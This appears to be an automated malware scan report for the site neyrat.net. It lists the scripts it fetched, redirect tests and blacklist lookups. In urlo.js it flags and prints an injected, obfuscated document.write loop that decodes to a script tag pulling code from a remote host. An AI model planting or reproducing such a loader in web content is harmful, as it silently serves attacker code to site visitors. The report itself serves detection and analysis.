Scanned pages/files
Request | Server response | Status |
http://www.neyrat.net/ | 200 OK Content-Length: 104978 Content-Type: text/html | clean |
http://www.neyrat.net/./mkportal/templates/mkvista/mkp.js | 200 OK Content-Length: 13966 Content-Type: application/x-javascript | clean |
http://www.neyrat.net/./mkportal/templates/mkvista/mkp.ext.ajax.js | 200 OK Content-Length: 11858 Content-Type: application/x-javascript | clean |
http://www.neyrat.net/js/highslide/highslide-with-gallery.js | 200 OK Content-Length: 74493 Content-Type: application/x-javascript | clean |
http://neyrat.net/mkportal/templates/mkvista/urlo.js | 200 OK Content-Length: 1815 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var http_request = false; function makePOSTRequest(url, parameters, my_span) { http_request = false; if (window.XMLHttpRequest) { http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { http_request.overrideMimeType("text/html"); } } else if (window.ActiveXObject) { try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { } } } function get(obj) { var poststr = "mytextarea1=" + escape(encodeURI(document.getElementById("mytextarea1").value )); makePOSTRequest("../index.php?ind=urlobox&op=update_block", poststr, "myspan"); } <!-- js-tools --> x=0;while(x<71)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00lsfnfodivh.qmbofu/dpn0xpseqsftt0tubu/qiq#?=0tdsjqu?'.charCodeAt(x++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://www.neyrat.net/addjs/js/prototype.js | 200 OK Content-Length: 47603 Content-Type: application/x-javascript | clean |
http://www.neyrat.net/addjs/js/scriptaculous.js?load=effects | 200 OK Content-Length: 2152 Content-Type: application/x-javascript | clean |
http://www.neyrat.net/addjs/js/lightbox.js | 200 OK Content-Length: 23835 Content-Type: application/x-javascript | clean |
http://www.google.com.ua/cse/brand?form=cse-search-box&lang=uk | 200 OK Content-Length: 2510 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21236 Content-Type: text/javascript | clean |
http://neyrat.net/orphus/orphus.js | 200 OK Content-Length: 10456 Content-Type: application/x-javascript | clean |
http://tools.spylog.ru/counter_cv.js | 200 OK Content-Length: 5066 Content-Type: application/x-javascript | clean |
http://scripts.mycounter.com.ua/counter2.0.js | 200 OK Content-Length: 3543 Content-Type: application/javascript | clean |
http://counter.rambler.ru/top100.jcn?1449208 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://js.ua.redtram.com/n4p/n/e/neyrat.net_neb.js | 200 OK Content-Length: 6436 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: neyrat.net
Result:
GET / HTTP/1.1
Host: neyrat.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: neyrat.net
Referer: http://www.google.com/search?q=neyrat.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: neyrat.net
Referer: http://www.google.com/search?q=neyrat.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=neyrat.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://neyrat.net/
Result: neyrat.net is not infected or malware details are not published yet.
Result: neyrat.net is not infected or malware details are not published yet.